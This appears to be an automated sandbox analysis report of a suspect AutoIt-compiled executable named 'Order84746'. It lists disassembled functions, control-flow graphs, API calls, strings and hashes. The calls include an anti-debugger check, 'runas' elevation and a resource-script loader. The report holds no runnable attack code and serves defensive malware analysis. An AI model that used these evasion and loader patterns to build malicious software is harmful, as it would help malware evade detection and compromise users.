                          control_flow_graph 856 90b043-90b080 call 90f8a0 859 90b082-90b084 856->859 860 90b089-90b08b 856->860 861 90b860-90b86c call 90a70c 859->861 862 90b0ac-90b0d9 860->862 863 90b08d-90b0a7 call 907bda call 907c0e call 906e10 860->863 864 90b0e0-90b0e7 862->864 865 90b0db-90b0de 862->865 863->861 870 90b105 864->870 871 90b0e9-90b100 call 907bda call 907c0e call 906e10 864->871 865->864 869 90b10b-90b110 865->869 874 90b112-90b11c call 90f82f 869->874 875 90b11f-90b12d call 913bf2 869->875 870->869 905 90b851-90b854 871->905 874->875 886 90b133-90b145 875->886 887 90b44b-90b45d 875->887 886->887 889 90b14b-90b183 call 907a0d GetConsoleMode 886->889 890 90b463-90b473 887->890 891 90b7b8-90b7d5 WriteFile 887->891 889->887 912 90b189-90b18f 889->912 896 90b479-90b484 890->896 897 90b55a-90b55f 890->897 893 90b7e1-90b7e7 GetLastError 891->893 894 90b7d7-90b7df 891->894 899 90b7e9 893->899 894->899 903 90b48a-90b49a 896->903 904 90b81b-90b833 896->904 900 90b663-90b66e 897->900 901 90b565-90b56e 897->901 909 90b7ef-90b7f1 899->909 900->904 908 90b674 900->908 901->904 910 90b574 901->910 913 90b4a0-90b4a3 903->913 906 90b835-90b838 904->906 907 90b83e-90b84e call 907c0e call 907bda 904->907 911 90b85e-90b85f 905->911 906->907 914 90b83a-90b83c 906->914 907->905 915 90b67e-90b693 908->915 917 90b7f3-90b7f5 909->917 918 90b856-90b85c 909->918 919 90b57e-90b595 910->919 911->861 920 90b191-90b193 912->920 921 90b199-90b1bc GetConsoleCP 912->921 922 90b4a5-90b4be 913->922 923 90b4e9-90b520 WriteFile 913->923 914->911 925 90b699-90b69b 915->925 917->904 927 90b7f7-90b7fc 917->927 918->911 928 90b59b-90b59e 919->928 920->887 920->921 929 90b440-90b446 921->929 930 90b1c2-90b1ca 921->930 931 90b4c0-90b4ca 922->931 932 90b4cb-90b4e7 922->932 923->893 924 90b526-90b538 923->924 924->909 933 90b53e-90b54f 924->933 934 90b6d8-90b719 WideCharToMultiByte 925->934 935 90b69d-90b6b3 925->935 937 90b812-90b819 call 907bed 927->937 938 90b7fe-90b810 call 907c0e call 907bda 927->938 939 90b5a0-90b5b6 928->939 940 90b5de-90b627 WriteFile 928->940 929->917 941 90b1d4-90b1d6 930->941 931->932 932->913 932->923 933->903 944 90b555 933->944 934->893 948 90b71f-90b721 934->948 945 90b6b5-90b6c4 935->945 946 90b6c7-90b6d6 935->946 937->905 938->905 950 90b5b8-90b5ca 939->950 951 90b5cd-90b5dc 939->951 940->893 953 90b62d-90b645 940->953 942 90b36b-90b36e 941->942 943 90b1dc-90b1fe 941->943 956 90b370-90b373 942->956 957 90b375-90b3a2 942->957 954 90b200-90b215 943->954 955 90b217-90b223 call 901688 943->955 944->909 945->946 946->925 946->934 958 90b727-90b75a WriteFile 948->958 950->951 951->928 951->940 953->909 961 90b64b-90b658 953->961 963 90b271-90b283 call 9140f7 954->963 976 90b225-90b239 955->976 977 90b269-90b26b 955->977 956->957 965 90b3a8-90b3ab 956->965 957->965 966 90b77a-90b78e GetLastError 958->966 967 90b75c-90b776 958->967 961->919 962 90b65e 961->962 962->909 987 90b435-90b43b 963->987 988 90b289 963->988 970 90b3b2-90b3c5 call 915884 965->970 971 90b3ad-90b3b0 965->971 975 90b794-90b796 966->975 967->958 973 90b778 967->973 970->893 990 90b3cb-90b3d5 970->990 971->970 978 90b407-90b40a 971->978 973->975 975->899 981 90b798-90b7b0 975->981 984 90b412-90b42d 976->984 985 90b23f-90b254 call 9140f7 976->985 977->963 978->941 983 90b410 978->983 981->915 982 90b7b6 981->982 982->909 983->987 984->987 985->987 998 90b25a-90b267 985->998 987->899 991 90b28f-90b2c4 WideCharToMultiByte 988->991 994 90b3d7-90b3ee call 915884 990->994 995 90b3fb-90b401 990->995 991->987 992 90b2ca-90b2f0 WriteFile 991->992 992->893 997 90b2f6-90b30e 992->997 994->893 1001 90b3f4-90b3f5 994->1001 995->978 997->987 1000 90b314-90b31b 997->1000 998->991 1000->995 1002 90b321-90b34c WriteFile 1000->1002 1001->995 1002->893 1003 90b352-90b359 1002->1003 1003->987 1004 90b35f-90b366 1003->1004 1004->995
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 31d5996a398bf6ae7fafa99eebaa8178d65a8ebef7a1d78b5f8d16cc8b996485
                          • Instruction ID: a0e7fef7d5b456cb6e0d6b5b7950d2f918e012abe63e930253f1ccbeb4441511
                          • Opcode Fuzzy Hash: 31d5996a398bf6ae7fafa99eebaa8178d65a8ebef7a1d78b5f8d16cc8b996485
                          • Instruction Fuzzy Hash: F8326C75B162298FDB248F54DC816E9B7B9FF8A310F1841D9E40AE7A91D7309E80CF52
                          Function 008E3D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,008E3AA3,?), ref: 008E3D45
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,008E3AA3,?), ref: 008E3D57
                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,009A1148,009A1130,?,?,?,?,008E3AA3,?), ref: 008E3DC8
                            • Part of subcall function 008E6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008E3DEE,009A1148,?,?,?,?,?,008E3AA3,?), ref: 008E6471
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,008E3AA3,?), ref: 008E3E48
                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009928F4,00000010), ref: 00951CCE
                          • SetCurrentDirectoryW.KERNEL32(?,009A1148,?,?,?,?,?,008E3AA3,?), ref: 00951D06
                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0097DAB4,009A1148,?,?,?,?,?,008E3AA3,?), ref: 00951D89
                          • ShellExecuteW.SHELL32(00000000,?,?,?,?,008E3AA3), ref: 00951D90
                            • Part of subcall function 008E3E6E: GetSysColorBrush.USER32(0000000F), ref: 008E3E79
                            • Part of subcall function 008E3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 008E3E88
                            • Part of subcall function 008E3E6E: LoadIconW.USER32(00000063), ref: 008E3E9E
                            • Part of subcall function 008E3E6E: LoadIconW.USER32(000000A4), ref: 008E3EB0
                            • Part of subcall function 008E3E6E: LoadIconW.USER32(000000A2), ref: 008E3EC2
                            • Part of subcall function 008E3E6E: RegisterClassExW.USER32(?), ref: 008E3F30
                            • Part of subcall function 008E36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008E36E6
                            • Part of subcall function 008E36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008E3707
                            • Part of subcall function 008E36B8: ShowWindow.USER32(00000000,?,?,?,?,008E3AA3,?), ref: 008E371B
                            • Part of subcall function 008E36B8: ShowWindow.USER32(00000000,?,?,?,?,008E3AA3,?), ref: 008E3724
                            • Part of subcall function 008E4FFC: _memset.LIBCMT ref: 008E5022
                            • Part of subcall function 008E4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008E50CB
                          Strings
                          • This is a third-party compiled AutoIt script., xrefs: 00951CC8
                          • runas, xrefs: 00951D84
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                          • String ID: This is a third-party compiled AutoIt script.$runas
                          • API String ID: 438480954-3287110873
                          • Opcode ID: ddd89b6b8a713f978c83786f4447e5145b2eef597d140375de36f2423510b525
                          • Instruction ID: a1fd96fc9a23303eecd045a0d2a3bb4de7898f63dacbb370a3765ab977f177d6
                          • Opcode Fuzzy Hash: ddd89b6b8a713f978c83786f4447e5145b2eef597d140375de36f2423510b525
                          • Instruction Fuzzy Hash: F851E830E0C289AACF11ABBADC45EED7B79FF57748F004068F551E3192DA704A459B62
                          Function 008E3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1169 8e3742-8e3762 1171 8e3764-8e3767 1169->1171 1172 8e37c2-8e37c4 1169->1172 1174 8e37c8 1171->1174 1175 8e3769-8e3770 1171->1175 1172->1171 1173 8e37c6 1172->1173 1176 8e37ab-8e37b3 NtdllDefWindowProc_W 1173->1176 1177 8e37ce-8e37d1 1174->1177 1178 951e00-951e2e call 8e2ff6 call 8fe312 1174->1178 1179 8e382c-8e3834 PostQuitMessage 1175->1179 1180 8e3776-8e377b 1175->1180 1187 8e37b9-8e37bf 1176->1187 1181 8e37f6-8e381d SetTimer RegisterClipboardFormatW 1177->1181 1182 8e37d3-8e37d4 1177->1182 1216 951e33-951e3a 1178->1216 1186 8e37f2-8e37f4 1179->1186 1184 951e88-951e9c call 924ddd 1180->1184 1185 8e3781-8e3783 1180->1185 1181->1186 1191 8e381f-8e382a CreatePopupMenu 1181->1191 1188 8e37da-8e37ed KillTimer call 8e3847 call 8e390f 1182->1188 1189 951da3-951da6 1182->1189 1184->1186 1210 951ea2 1184->1210 1192 8e3789-8e378e 1185->1192 1193 8e3836-8e3845 call 8feb83 1185->1193 1186->1187 1188->1186 1195 951ddc-951dfb MoveWindow 1189->1195 1196 951da8-951daa 1189->1196 1191->1186 1199 951e6d-951e74 1192->1199 1200 8e3794-8e3799 1192->1200 1193->1186 1195->1186 1203 951dac-951daf 1196->1203 1204 951dcb-951dd7 SetFocus 1196->1204 1199->1176 1206 951e7a-951e83 call 91a5f3 1199->1206 1208 8e379f-8e37a5 1200->1208 1209 951e58-951e68 call 9255bd 1200->1209 1203->1208 1212 951db5-951dc6 call 8e2ff6 1203->1212 1204->1186 1206->1176 1208->1176 1208->1216 1209->1186 1210->1176 1212->1186 1216->1176 1220 951e40-951e53 call 8e3847 call 8e4ffc 1216->1220 1220->1176
                          APIs
                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 008E37B3
                          • KillTimer.USER32(?,00000001), ref: 008E37DD
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008E3800
                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008E380B
                          • CreatePopupMenu.USER32 ref: 008E381F
                          • PostQuitMessage.USER32(00000000), ref: 008E382E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                          • String ID: TaskbarCreated
                          • API String ID: 157504867-2362178303
                          • Opcode ID: 3323f641371e53f384dbb19d1466e5048fde14fa67b734506895aa91ecbf4f43
                          • Instruction ID: a32a332be5073170a50edd17d18fcceb0dfa1ec36596e7e05475addd78d464ca
                          • Opcode Fuzzy Hash: 3323f641371e53f384dbb19d1466e5048fde14fa67b734506895aa91ecbf4f43
                          • Instruction Fuzzy Hash: DE412CF561C2ED67DB149B2ADC4EB793A99FB47345F000139F912D31A1CB609D40A7A2
                          Function 008FDDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1291 8fddc0-8fde4f call 8ed7f7 GetVersionExW call 8e6a63 call 8fdfb4 call 8e6571 1300 8fde55-8fde56 1291->1300 1301 9524c8-9524cb 1291->1301 1302 8fde58-8fde63 1300->1302 1303 8fde92-8fdea2 call 8fdf77 1300->1303 1304 9524e4-9524e8 1301->1304 1305 9524cd 1301->1305 1308 8fde69-8fde6b 1302->1308 1309 95244e-952454 1302->1309 1322 8fdec7-8fdee1 1303->1322 1323 8fdea4-8fdec1 GetCurrentProcess call 8fdf5f 1303->1323 1306 9524d3-9524dc 1304->1306 1307 9524ea-9524f3 1304->1307 1311 9524d0 1305->1311 1306->1304 1307->1311 1314 9524f5-9524f8 1307->1314 1315 952469-952475 1308->1315 1316 8fde71-8fde74 1308->1316 1312 952456-952459 1309->1312 1313 95245e-952464 1309->1313 1311->1306 1312->1303 1313->1303 1314->1306 1318 952477-95247a 1315->1318 1319 95247f-952485 1315->1319 1320 952495-952498 1316->1320 1321 8fde7a-8fde89 1316->1321 1318->1303 1319->1303 1320->1303 1326 95249e-9524b3 1320->1326 1327 8fde8f 1321->1327 1328 95248a-952490 1321->1328 1324 8fdee3-8fdef7 call 8fe00c 1322->1324 1325 8fdf31-8fdf3b GetSystemInfo 1322->1325 1323->1322 1342 8fdec3 1323->1342 1339 8fdf29-8fdf2f GetSystemInfo 1324->1339 1340 8fdef9-8fdf01 call 8fdff4 GetNativeSystemInfo 1324->1340 1331 8fdf0e-8fdf1a 1325->1331 1333 9524b5-9524b8 1326->1333 1334 9524bd-9524c3 1326->1334 1327->1303 1328->1303 1336 8fdf1c-8fdf1f FreeLibrary 1331->1336 1337 8fdf21-8fdf26 1331->1337 1333->1303 1334->1303 1336->1337 1341 8fdf03-8fdf07 1339->1341 1340->1341 1341->1331 1345 8fdf09-8fdf0c FreeLibrary 1341->1345 1342->1322 1345->1331
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 008FDDEC
                          • GetCurrentProcess.KERNEL32(00000000,0097DC38,?,?), ref: 008FDEAC
                          • GetNativeSystemInfo.KERNELBASE(?,0097DC38,?,?), ref: 008FDF01
                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 008FDF0C
                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 008FDF1F
                          • GetSystemInfo.KERNEL32(?,0097DC38,?,?), ref: 008FDF29
                          • GetSystemInfo.KERNEL32(?,0097DC38,?,?), ref: 008FDF35
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                          • String ID:
                          • API String ID: 3851250370-0
                          • Opcode ID: e61cb3a610133454225285b776b11267b601cbd9553f3a82a9d385bd6b15135b
                          • Instruction ID: 7a2e909c7d46aa5d2e363be36c9048d2ae26c18411e535ac3a34138e880e00af
                          • Opcode Fuzzy Hash: e61cb3a610133454225285b776b11267b601cbd9553f3a82a9d385bd6b15135b
                          • Instruction Fuzzy Hash: 2861A0B190A388CBCF15CF7898C15E97FB5BF2A304B1989D9DD459F207C624C909CB66
                          Function 008E406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1363 8e406b-8e4083 CreateStreamOnHGlobal 1364 8e4085-8e409c FindResourceExW 1363->1364 1365 8e40a3-8e40a6 1363->1365 1366 954f16-954f25 LoadResource 1364->1366 1367 8e40a2 1364->1367 1366->1367 1368 954f2b-954f39 SizeofResource 1366->1368 1367->1365 1368->1367 1369 954f3f-954f4a LockResource 1368->1369 1369->1367 1370 954f50-954f6e 1369->1370 1370->1367
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008E407B
                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008E449E,?,?,00000000,00000001), ref: 008E4092
                          • LoadResource.KERNEL32(?,00000000,?,?,008E449E,?,?,00000000,00000001,?,?,?,?,?,?,008E41FB), ref: 00954F1A
                          • SizeofResource.KERNEL32(?,00000000,?,?,008E449E,?,?,00000000,00000001,?,?,?,?,?,?,008E41FB), ref: 00954F2F
                          • LockResource.KERNEL32(008E449E,?,?,008E449E,?,?,00000000,00000001,?,?,?,?,?,?,008E41FB,00000000), ref: 00954F42
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                          • String ID: SCRIPT
                          • API String ID: 3051347437-3967369404
                          • Opcode ID: 6e07e6fc69aca8e64412c336c6a77bca30e83ca0575d799471723c452105a6ec
                          • Instruction ID: f5d265090bce0c3ab9b2dc4fad610ff0cacdbecbf5d8757554b5d31b52aa1afd
                          • Opcode Fuzzy Hash: 6e07e6fc69aca8e64412c336c6a77bca30e83ca0575d799471723c452105a6ec
                          • Instruction Fuzzy Hash: 6C117C71604741BFE7218B66EC58F277BB9EBC6B51F10416CF626C62A0DBB1DC00AA20
                          Function 009E5F50 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 009E608A
                          • GetProcAddress.KERNEL32(?,009DEFF9), ref: 009E60A8
                          • ExitProcess.KERNEL32(?,009DEFF9), ref: 009E60B9
                          • VirtualProtect.KERNELBASE(008E0000,00001000,00000004,?,00000000), ref: 009E6107
                          • VirtualProtect.KERNELBASE(008E0000,00001000), ref: 009E611C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                          • String ID:
                          • API String ID: 1996367037-0
                          • Opcode ID: 340f77d884b0ca9115a02332fdb89c0415e1aac5b89ccb16715bbfba70c54138
                          • Instruction ID: 0e4ad0cc832be905687ce8c7c91aa929a304c0323ce45115322a8ce0a2d81b38
                          • Opcode Fuzzy Hash: 340f77d884b0ca9115a02332fdb89c0415e1aac5b89ccb16715bbfba70c54138
                          • Instruction Fuzzy Hash: 40516A72A447E24BD7229A7ACCC0770B798EB613757290B38D5E1C73C6EBA45C0587A0
                          Function 00926CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNELBASE(?,00952F49), ref: 00926CB9
                          • FindFirstFileW.KERNELBASE(?,?), ref: 00926CCA
                          • FindClose.KERNEL32(00000000), ref: 00926CDA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: FileFind$AttributesCloseFirst
                          • String ID:
                          • API String ID: 48322524-0
                          • Opcode ID: 030314d059a2f3d356da23772819194350027ac75d7902dd81762010bb716adc
                          • Instruction ID: c2752405c2a976c2269106b1c46ab56df3f0b9fb953fa680dbe14596025971c9
                          • Opcode Fuzzy Hash: 030314d059a2f3d356da23772819194350027ac75d7902dd81762010bb716adc
                          • Instruction Fuzzy Hash: 83E0D831D29420578214B738FC0D4E937ACDA0A339F100709F5F1C11D0E7F0E90056D5
                          Function 008EE8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                          Download Yara Rule
                          APIs
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008EE959
                          • timeGetTime.WINMM ref: 008EEBFA
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008EED2E
                          • TranslateMessage.USER32(?), ref: 008EED3F
                          • DispatchMessageW.USER32(?), ref: 008EED4A
                          • LockWindowUpdate.USER32(00000000), ref: 008EED79
                          • DestroyWindow.USER32 ref: 008EED85
                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008EED9F
                          • Sleep.KERNEL32(0000000A), ref: 00955270
                          • TranslateMessage.USER32(?), ref: 009559F7
                          • DispatchMessageW.USER32(?), ref: 00955A05
                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00955A19
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                          • API String ID: 2641332412-570651680
                          • Opcode ID: e314412bd3488f3dcf1ab59851ad6369cbdc0c5f7e68f569376023fe1ded90a4
                          • Instruction ID: 926d3bda8181ac10b8cabc8bd47a1668754c5df1702a7f0b8fde91bbb725f146
                          • Opcode Fuzzy Hash: e314412bd3488f3dcf1ab59851ad6369cbdc0c5f7e68f569376023fe1ded90a4
                          • Instruction Fuzzy Hash: 2062C070508384DFDB24DF29C895BAA77E4FF86304F14486DE986CB292DBB1D848CB52
                          Function 00915C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___createFile.LIBCMT ref: 00915EC3
                          • ___createFile.LIBCMT ref: 00915F04
                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00915F2D
                          • __dosmaperr.LIBCMT ref: 00915F34
                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00915F47
                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00915F6A
                          • __dosmaperr.LIBCMT ref: 00915F73
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00915F7C
                          • __set_osfhnd.LIBCMT ref: 00915FAC
                          • __lseeki64_nolock.LIBCMT ref: 00916016
                          • __close_nolock.LIBCMT ref: 0091603C
                          • __chsize_nolock.LIBCMT ref: 0091606C
                          • __lseeki64_nolock.LIBCMT ref: 0091607E
                          • __lseeki64_nolock.LIBCMT ref: 00916176
                          • __lseeki64_nolock.LIBCMT ref: 0091618B
                          • __close_nolock.LIBCMT ref: 009161EB
                            • Part of subcall function 0090EA9C: CloseHandle.KERNELBASE(00000000,0098EEF4,00000000,?,00916041,0098EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0090EAEC
                            • Part of subcall function 0090EA9C: GetLastError.KERNEL32(?,00916041,0098EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0090EAF6
                            • Part of subcall function 0090EA9C: __free_osfhnd.LIBCMT ref: 0090EB03
                            • Part of subcall function 0090EA9C: __dosmaperr.LIBCMT ref: 0090EB25
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          • __lseeki64_nolock.LIBCMT ref: 0091620D
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00916342
